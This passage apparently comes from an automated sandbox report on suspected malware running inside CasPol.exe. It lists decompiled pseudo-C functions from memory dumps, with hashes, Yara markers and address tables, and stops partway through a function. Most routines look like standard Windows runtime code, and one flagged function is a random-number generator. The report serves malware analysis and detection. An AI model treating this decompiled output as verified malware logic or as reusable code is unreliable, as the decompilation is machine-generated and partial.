                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 868f8848cc0017c96682057139142897486ae11c8f30db65a7bbf8e11136fabf
                                                                        • Instruction ID: e503b2f001887b4e9d272e8574f2700f8db73224c201d040bcf754bef4412a1e
                                                                        • Opcode Fuzzy Hash: 868f8848cc0017c96682057139142897486ae11c8f30db65a7bbf8e11136fabf
                                                                        • Instruction Fuzzy Hash: 2C31CE72B006265BD344CE3AD88065AB3E2FBC8350B54863AD919C3B41E778F962CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E61A0 Relevance: .1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E013E61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E013E5E50(0x13967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01489D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E013BF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                        0x013e61b3
                                                                        0x013e61b5
                                                                        0x013e61bd
                                                                        0x013e61c3
                                                                        0x013e61c7
                                                                        0x013e61d2
                                                                        0x013e61ff
                                                                        0x013e61ff
                                                                        0x013e6201
                                                                        0x013e6207
                                                                        0x013e6207
                                                                        0x013e61d4
                                                                        0x013e61d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e61df
                                                                        0x013e61e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e61e6
                                                                        0x013e61e8
                                                                        0x013e61ee
                                                                        0x013e61ee
                                                                        0x013e61f9
                                                                        0x0142762f
                                                                        0x01427632
                                                                        0x01427635
                                                                        0x01427639
                                                                        0x01427640
                                                                        0x0142766e
                                                                        0x01427675
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427681
                                                                        0x01427689
                                                                        0x0142768d
                                                                        0x01427691
                                                                        0x01427695
                                                                        0x01427699
                                                                        0x014276af
                                                                        0x014276b5
                                                                        0x014276b7
                                                                        0x014276b7
                                                                        0x014276d7
                                                                        0x014276dc
                                                                        0x00000000
                                                                        0x014276dc
                                                                        0x014276a2
                                                                        0x014276a9
                                                                        0x01427651
                                                                        0x01427653
                                                                        0x01427653
                                                                        0x01427656
                                                                        0x01427656
                                                                        0x00000000
                                                                        0x01427656
                                                                        0x01427644
                                                                        0x01427646
                                                                        0x01427648
                                                                        0x01427648
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 683f522c922339be4affa192009e52d27b90a6f7a53bc465d96c23d7cb5f61e4
                                                                        • Instruction ID: a6ec99356f77767c89956ef1bfed642d24a130faf650055495d9f84ad0b6edce
                                                                        • Opcode Fuzzy Hash: 683f522c922339be4affa192009e52d27b90a6f7a53bc465d96c23d7cb5f61e4
                                                                        • Instruction Fuzzy Hash: F831A0B16057218FE360CF0DC845B26BBE8FFA8B14F44496EE998973A1E770D844CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BAA16 Relevance: .1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E013BAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x14ad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x14a7b9c; // 0x0
					_t53 = L013D4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E013FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E013FF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L013C6C59(_t53, _t51, _t58) != 0) {
							_t28 = E013E5E50(0x139c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E013EB230(_v32, _v28, 0x139c2d8, 1,  &_v24);
								_t28 = E013BF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                        0x013baa25
                                                                        0x013baa29
                                                                        0x013baa2d
                                                                        0x013baa30
                                                                        0x013baa37
                                                                        0x013baa3c
                                                                        0x01414458
                                                                        0x01414458
                                                                        0x01414472
                                                                        0x01414474
                                                                        0x01414476
                                                                        0x013baa64
                                                                        0x013baa74
                                                                        0x0141447c
                                                                        0x01414483
                                                                        0x01414492
                                                                        0x013baa52
                                                                        0x013baa54
                                                                        0x013baa5e
                                                                        0x014144a8
                                                                        0x014144ad
                                                                        0x014144af
                                                                        0x014144b6
                                                                        0x014144b6
                                                                        0x014144b9
                                                                        0x014144bc
                                                                        0x014144cd
                                                                        0x014144d3
                                                                        0x014144d6
                                                                        0x014144e1
                                                                        0x014144e1
                                                                        0x014144e6
                                                                        0x014144e8
                                                                        0x014144fb
                                                                        0x014144fb
                                                                        0x014144e8
                                                                        0x00000000
                                                                        0x013baa5e
                                                                        0x01414476
                                                                        0x013baa42
                                                                        0x013baa46
                                                                        0x013baa48
                                                                        0x013baa4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 913658f3183dd56045d0347581a11579dd337e9c876035da0bb7362d516a078b
                                                                        • Instruction ID: 9abaf09474191347b668ee4ca38ec37ecaae111e50d82d226a62a350defca746
                                                                        • Opcode Fuzzy Hash: 913658f3183dd56045d0347581a11579dd337e9c876035da0bb7362d516a078b
                                                                        • Instruction Fuzzy Hash: F131E572A0061AABDF11DF6CCD81ABFB7B8EF04704B45406AF901EB254E7349911C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401B30 Relevance: .1, Instructions: 92COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00401B30(signed int _a4) {
				char* _t19;
				signed int _t27;
				signed int _t33;
				signed int _t51;
				signed int _t52;
				intOrPtr _t60;
				signed int _t67;
				signed int _t75;
				intOrPtr _t81;

				_t19 = _a4;
				if(_t19 != 0) {
					if( *_t19 == 0) {
						_t51 =  *(_t19 + 4);
						 *_t19 = 1;
						_t60 =  *0x7ffe0018;
						_t81 =  *0x7ffe001c;
						if(_t51 == 0) {
							_t52 =  *0x7ffe0014;
							do {
							} while (_t60 != _t81);
						} else {
							do {
							} while (_t60 != _t81);
							_t52 = _t51 *  *0x7ffe0014;
						}
						 *(_t19 + 8) = _t52;
						 *(_t19 + 0xc) = 0x76d0;
						 *(_t19 + 0x10) = 0x4c11;
						 *(_t19 + 0x14) = 0x7f40;
					}
					_t27 = ( *(_t19 + 8) << 0x00000012 ^  *(_t19 + 8) >> 0x00000007) & 0x0007ffff ^  *(_t19 + 8) << 0x00000012 ^ _t53 >> 0x0000000d;
					_t55 =  *(_t19 + 0xc);
					_a4 = _t27;
					 *(_t19 + 8) = _t27;
					_t56 =  *(_t19 + 0x10);
					_t33 = ( *(_t19 + 0xc) >> 0x00000019 ^  *(_t19 + 0xc) * 0x00000004) & 0x0000001f ^ _t55 >> 0x0000001b ^ _t55 * 0x00000004;
					_t67 = ( *(_t19 + 0x10) >> 0x00000008 ^  *(_t19 + 0x10) << 0x00000007) & 0x000007ff ^ _t56 >> 0x00000015 ^ _t56 << 0x00000007;
					_t75 = ( *(_t19 + 0x14) << 0x0000000d ^  *(_t19 + 0x14) >> 0x00000009) & 0x000fffff ^  *(_t19 + 0x14) >> 0x0000000c ^ _t58 << 0x0000000d;
					 *(_t19 + 0x14) = _t75;
					 *(_t19 + 0x10) = _t67;
					 *(_t19 + 0xc) = _t33;
					return (_t75 ^ _t67 ^ _t33 ^ _a4) >> 1;
				} else {
					return _t19;
				}
			}












                                                                        0x00401b33
                                                                        0x00401b38
                                                                        0x00401b42
                                                                        0x00401b44
                                                                        0x00401b47
                                                                        0x00401b4a
                                                                        0x00401b50
                                                                        0x00401b58
                                                                        0x00401b6d
                                                                        0x00401b73
                                                                        0x00401b73
                                                                        0x00401b60
                                                                        0x00401b60
                                                                        0x00401b60
                                                                        0x00401b64
                                                                        0x00401b64
                                                                        0x00401b77
                                                                        0x00401b7a
                                                                        0x00401b81
                                                                        0x00401b88
                                                                        0x00401b88
                                                                        0x00401bae
                                                                        0x00401bb0
                                                                        0x00401bb3
                                                                        0x00401bb6
                                                                        0x00401bd8
                                                                        0x00401bdb
                                                                        0x00401bf9
                                                                        0x00401c1a
                                                                        0x00401c1c
                                                                        0x00401c26
                                                                        0x00401c2b
                                                                        0x00401c34
                                                                        0x00401b3b
                                                                        0x00401b3b
                                                                        0x00401b3b

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e10294f799e217ca4870a10e36f17fcc428f1fa04ff6ead30c529083e300284
                                                                        • Instruction ID: 03c70336a4477be214f950dbac9bbdc3b87b084157193ef14a93f6bd51de86e4
                                                                        • Opcode Fuzzy Hash: 1e10294f799e217ca4870a10e36f17fcc428f1fa04ff6ead30c529083e300284
                                                                        • Instruction Fuzzy Hash: D931E272B006104FD71CCF55C494A66B7A3ABC8360B1AC2BEDA1A5B3E1CB78AC10C7D4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F4A2C Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E013F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x14ad360 ^ _t62;
				_v8 =  *0x14ad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E013D2280(_t26, 0x14a8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E013CFFB0(_t41, _t51, 0x14a8608);
						L2:
						 *0x14ab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E013FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E013D2280(_t28, 0x14a8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E013CFFB0(_t42, _t53, 0x14a8608);
							if(_t53 != 0) {
								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E013CFFB0(_t41, _t51, 0x14a8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                        0x013f4a2c
                                                                        0x013f4a34
                                                                        0x013f4a3c
                                                                        0x013f4a3e
                                                                        0x013f4a48
                                                                        0x013f4a4b
                                                                        0x013f4a4d
                                                                        0x013f4a51
                                                                        0x013f4a9c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f4aa3
                                                                        0x013f4aa8
                                                                        0x013f4aad
                                                                        0x013f4ab1
                                                                        0x013f4ade
                                                                        0x013f4ae3
                                                                        0x013f4a5a
                                                                        0x013f4a62
                                                                        0x013f4a6a
                                                                        0x013f4a6e
                                                                        0x0142f203
                                                                        0x013f4a84
                                                                        0x013f4a88
                                                                        0x013f4a89
                                                                        0x013f4a8a
                                                                        0x013f4a95
                                                                        0x013f4a95
                                                                        0x013f4a79
                                                                        0x013f4a80
                                                                        0x013f4af2
                                                                        0x013f4af4
                                                                        0x013f4af9
                                                                        0x013f4aff
                                                                        0x013f4b01
                                                                        0x013f4b03
                                                                        0x013f4b08
                                                                        0x0142f20a
                                                                        0x0142f212
                                                                        0x0142f216
                                                                        0x0142f216
                                                                        0x013f4b08
                                                                        0x013f4b13
                                                                        0x013f4b1a
                                                                        0x0142f229
                                                                        0x0142f229
                                                                        0x013f4b1a
                                                                        0x013f4a82
                                                                        0x00000000
                                                                        0x013f4a82
                                                                        0x013f4ab7
                                                                        0x013f4acd
                                                                        0x013f4acd
                                                                        0x013f4ad5
                                                                        0x013f4ada
                                                                        0x00000000
                                                                        0x013f4ada
                                                                        0x013f4ac2
                                                                        0x013f4acb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f4acb
                                                                        0x013f4a53
                                                                        0x013f4a53
                                                                        0x013f4a58
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff56bb0ed88dca791bc173ad19b5483a58ae6ace8aebe99fc18733e92dc6cec4
                                                                        • Instruction ID: 70e52ffafd1f6cbe6962f378556b1d504faadf0e3857d5c753e9ef0420555e13
                                                                        • Opcode Fuzzy Hash: ff56bb0ed88dca791bc173ad19b5483a58ae6ace8aebe99fc18733e92dc6cec4
                                                                        • Instruction Fuzzy Hash: 3F3146322053129BEB219F1CC940B2BFBB8FF91B18F85441EEA5607651CB70D848CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F8EC7 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E013F8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x14ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E013E4E70(0x14a86e4, 0x13f9490, 0, 0);
					if( *0x14a53e8 > 5 && E013F8F33(0x14a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x14a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x14a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x139bc46;
						_t48 = E01437B9C(0x14a53e8, 0x139bc46, _t67, 0x14a53e8, _t70,  &_v140);
					}
				}
				return E013FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                        0x013f8ec7
                                                                        0x013f8ed9
                                                                        0x013f8edc
                                                                        0x013f8ee6
                                                                        0x013f8ee9
                                                                        0x013f8eee
                                                                        0x013f8efc
                                                                        0x013f8f08
                                                                        0x01431349
                                                                        0x01431353
                                                                        0x0143135d
                                                                        0x01431366
                                                                        0x0143136f
                                                                        0x01431375
                                                                        0x0143137c
                                                                        0x01431385
                                                                        0x01431390
                                                                        0x01431391
                                                                        0x0143139c
                                                                        0x0143139d
                                                                        0x014313a6
                                                                        0x014313ac
                                                                        0x014313b2
                                                                        0x014313b5
                                                                        0x014313bc
                                                                        0x014313bf
                                                                        0x014313c2
                                                                        0x014313c5
                                                                        0x014313c8
                                                                        0x014313cb
                                                                        0x014313ce
                                                                        0x014313d1
                                                                        0x014313d4
                                                                        0x014313d7
                                                                        0x014313da
                                                                        0x014313dd
                                                                        0x014313e0
                                                                        0x014313e3
                                                                        0x014313e6
                                                                        0x014313e9
                                                                        0x014313f6
                                                                        0x01431400
                                                                        0x01431400
                                                                        0x013f8f08
                                                                        0x013f8f32

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3422c9be5fc57c98d6f2a4fcfcd6309d80a557a818371ad190b71589b8301385
                                                                        • Instruction ID: 8db2128c83e79b078f5809992544eadff153dc32de491ab812ed95ef61347d87
                                                                        • Opcode Fuzzy Hash: 3422c9be5fc57c98d6f2a4fcfcd6309d80a557a818371ad190b71589b8301385
                                                                        • Instruction Fuzzy Hash: 574181B1D003189FDB24CFAAD981AADFBF8FB48714F5041AEE649A7640D7705A44CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EE730 Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E013EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E013F9670() < 0) {
					L0140DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x14a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L013D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M013EE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                        0x013ee730
                                                                        0x013ee736
                                                                        0x013ee738
                                                                        0x013ee73d
                                                                        0x013ee73e
                                                                        0x013ee740
                                                                        0x013ee749
                                                                        0x013ee765
                                                                        0x013ee76a
                                                                        0x013ee76b
                                                                        0x013ee76c
                                                                        0x013ee76d
                                                                        0x013ee76e
                                                                        0x013ee76f
                                                                        0x013ee775
                                                                        0x013ee777
                                                                        0x013ee77e
                                                                        0x0142b675
                                                                        0x013ee784
                                                                        0x013ee784
                                                                        0x013ee789
                                                                        0x013ee7a8
                                                                        0x013ee7ac
                                                                        0x013ee807
                                                                        0x013ee7ae
                                                                        0x013ee7ae
                                                                        0x013ee7b1
                                                                        0x013ee7b4
                                                                        0x013ee7b9
                                                                        0x013ee7c0
                                                                        0x013ee7c4
                                                                        0x013ee7ca
                                                                        0x013ee7cc
                                                                        0x00000000
                                                                        0x013ee7d3
                                                                        0x013ee7d6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ee7ff
                                                                        0x013ee802
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ee7f9
                                                                        0x013ee7fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ee7f3
                                                                        0x013ee7f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ee7ed
                                                                        0x013ee7f0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ee7e7
                                                                        0x013ee7ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142b685
                                                                        0x0142b688
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142b682
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ee7cc
                                                                        0x013ee7d9
                                                                        0x013ee7dc
                                                                        0x013ee7de
                                                                        0x013ee7de
                                                                        0x013ee7ac
                                                                        0x013ee7e4
                                                                        0x013ee74b
                                                                        0x013ee751
                                                                        0x013ee759
                                                                        0x013ee761
                                                                        0x013ee761

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e2064e7c59be8fe48082a93992b967c5331228a5ea25dc191d796ef2ee259c5
                                                                        • Instruction ID: 1a578373f0d5c957a930f61de8692ea7e2b339c52894c3ffb6d4c6ca9b2776a4
                                                                        • Opcode Fuzzy Hash: 6e2064e7c59be8fe48082a93992b967c5331228a5ea25dc191d796ef2ee259c5
                                                                        • Instruction Fuzzy Hash: 85318F75A54349EFD704CF58D845B96BBE8FB09314F14826AF904CB391D631ED80CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EBC2C Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E013EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x14a6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E013D2280(0xd, 0x673f1a0);
				_t41 =  *0x14a60f8; // 0x0
				if(_t41 != 0) {
					 *0x14a60f8 =  *_t41;
					 *0x14a60fc =  *0x14a60fc + 0xffff;
				}
				E013CFFB0(_t41, 0x800, 0x673f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
